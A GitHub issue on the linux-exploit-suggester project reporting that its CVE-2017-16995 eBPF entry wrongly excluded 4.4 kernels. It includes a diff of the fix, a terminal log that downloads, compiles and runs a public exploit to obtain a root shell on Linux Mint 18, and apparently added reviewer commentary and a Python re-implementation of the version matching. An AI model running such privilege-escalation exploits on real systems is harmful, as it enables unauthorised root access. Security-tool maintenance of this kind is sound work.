The-Z-Labs/linux-exploit-suggester

[CVE-2017-16995] Incorrect kernel version check

bcoles opened this issue · 2 comments

It appears the kernel version check for CVE-2017-16995 is incorrect.

As an example, on a vulnerable Linux Mint 18 kernel 4.4.0-116-generic system:

user@mint-18 ~/Desktop/linux-exploit-suggester $ uname -r
4.4.0-116-generic
user@mint-18 ~/Desktop/linux-exploit-suggester $ git diff linux-exploit-suggester.sh
user@mint-18 ~/Desktop/linux-exploit-suggester $ ./linux-exploit-suggester.sh | grep 2017-16995
user@mint-18 ~/Desktop/linux-exploit-suggester $ fg
vi linux-exploit-suggester.sh

[1]+  Stopped                 vi linux-exploit-suggester.sh
user@mint-18 ~/Desktop/linux-exploit-suggester $ git diff linux-exploit-suggester.sh
diff --git a/linux-exploit-suggester.sh b/linux-exploit-suggester.sh
index e9c88d4..cad912c 100755
--- a/linux-exploit-suggester.sh
+++ b/linux-exploit-suggester.sh
@@ -688,7 +688,7 @@ EOF
 
 EXPLOITS[((n++))]=$(cat <<EOF
 Name: ${txtgrn}[CVE-2017-16995]${txtrst} eBPF_verifier
-Reqs: pkg=linux-kernel,ver>=4.9,ver<=4.14.8,CONFIG_BPF_SYSCALL=y,sysctl:kernel.unprivileged_bpf_disabled!=1
+Reqs: pkg=linux-kernel,ver>=4.4,ver<=4.14.8,CONFIG_BPF_SYSCALL=y,sysctl:kernel.unprivileged_bpf_disabled!=1
 Tags: ubuntu=16.04.4(kernel:4.4.0-116)
 analysis-url: https://blog.aquasec.com/ebpf-vulnerability-cve-2017-16995-when-the-doorman-becomes-the-backdoor
 Comments: CONFIG_BPF_SYSCALL needs to be set && kernel.unprivileged_bpf_disabled != 1
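Review bot: widening the lower bound to `ver>=4.4` removes the contradiction with the entry's own `Tags: ubuntu=16.04.4(kernel:4.4.0-116)` line, which already named a 4.4 kernel that the old `ver>=4.9` excluded. Since the report attributes the 4.4 exposure to a backport into Ubuntu's kernel, the widened range will now also match other 4.4 to 4.8 kernels whether or not they carry that backport; consider noting in the `Comments:` line that the 4.4 lower bound reflects the Ubuntu/Mint backport, so a later reader does not tighten it back to 4.9.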
user@mint-18 ~/Desktop/linux-exploit-suggester $ ./linux-exploit-suggester.sh | grep 2017-16995
[+] [CVE-2017-16995] eBPF_verifier
   Details: https://blog.aquasec.com/ebpf-vulnerability-cve-2017-16995-when-the-doorman-becomes-the-backdoor

The 4.4.0-116-generic kernel on Ubuntu and Linux Mint is confirmed vulnerable to the exploit:

user@mint-18 ~/Desktop/linux-exploit-suggester $ wget 'https://www.exploit-db.com/download/44298'
--2018-03-25 15:32:03--  https://www.exploit-db.com/download/44298
Resolving www.exploit-db.com (www.exploit-db.com)... 192.124.249.8
Connecting to www.exploit-db.com (www.exploit-db.com)|192.124.249.8|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 6021 (5.9K) [application/txt]
Saving to: ‘44298’

44298                           100%[=====================================================>]   5.88K  --.-KB/s    in 0s      

2018-03-25 15:32:04 (1.06 GB/s) - ‘44298’ saved [6021/6021]

user@mint-18 ~/Desktop/linux-exploit-suggester $ mv 44298 44298.c
user@mint-18 ~/Desktop/linux-exploit-suggester $ gcc 44298.c 
user@mint-18 ~/Desktop/linux-exploit-suggester $ ./a.out 
task_struct = ffff880036c23800
uidptr = ffff880038381c04
spawning root shell
mint-18 linux-exploit-suggester # id
uid=0(root) gid=0(root) groups=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),130(sambashare),1000(user)

It seems there is some confusion over the CVEs. For example, the following sources provide conflicting information on the affected kernels:

Regardless, the specified exploit works on the 4.4 kernel.

Appears the bug was backported to the 4.4 kernel:
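To show why the original Reqs line missed this host, here is an added Python re-implementation of the requirement matching; it is not the script's own logic (which the page does not show) and the host profile is constructed from the Mint 18 box in the report, with `kernel.unprivileged_bpf_disabled` assumed to be 0.

```python
import re

# Constructed sample data: the Reqs line before and after the change in the issue,
# and a host profile modelled on the Linux Mint 18 / 4.4.0-116-generic box above.
REQS_BEFORE = ("pkg=linux-kernel,ver>=4.9,ver<=4.14.8,CONFIG_BPF_SYSCALL=y,"
               "sysctl:kernel.unprivileged_bpf_disabled!=1")
REQS_AFTER = REQS_BEFORE.replace("ver>=4.9", "ver>=4.4")
MINT_18 = {"pkg": "linux-kernel", "ver": "4.4.0-116-generic",
           "config": {"CONFIG_BPF_SYSCALL": "y"},
           "sysctl": {"kernel.unprivileged_bpf_disabled": "0"}}  # assumed value

# One requirement: optional "sysctl:" prefix, a key, an operator and a value.
REQ_RE = re.compile(r"^(sysctl:)?([\w.\-]+)(>=|<=|!=|=)(.+)$")

def parse_version(s):
    """Major.minor.patch tuple from a 'uname -r' string; '-116-generic' is ignored."""
    m = re.match(r"(\d+)(?:\.(\d+))?(?:\.(\d+))?", s)
    return tuple(int(x or 0) for x in m.groups())

def check(op, have, want):
    """Apply one comparison operator; '=' is plain equality."""
    return {">=": have >= want, "<=": have <= want,
            "!=": have != want, "=": have == want}[op]

def unmet_requirements(reqs, host):
    """Return the requirements in `reqs` that `host` does not satisfy (empty = match)."""
    failed = []
    for req in reqs.split(","):
        is_sysctl, key, op, want = REQ_RE.match(req).groups()
        if is_sysctl:
            ok = check(op, host["sysctl"].get(key, ""), want)
        elif key == "ver":
            ok = check(op, parse_version(host["ver"]), parse_version(want))
        elif key == "pkg":
            ok = check(op, host["pkg"], want)
        else:  # CONFIG_* kernel build option
            ok = check(op, host["config"].get(key, "n"), want)
        if not ok:
            failed.append(req)
    return failed

if __name__ == "__main__":
    print("before fix:", unmet_requirements(REQS_BEFORE, MINT_18))  # ['ver>=4.9']
    print("after fix: ", unmet_requirements(REQS_AFTER, MINT_18))   # []
```

Because only the numeric version is compared, a distribution kernel that carries a backported bug under an older version number is only reported once the range is widened, as in the diff; the Tags line is what ties the entry to that specific distribution kernel.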

mzet- commented

Thanks.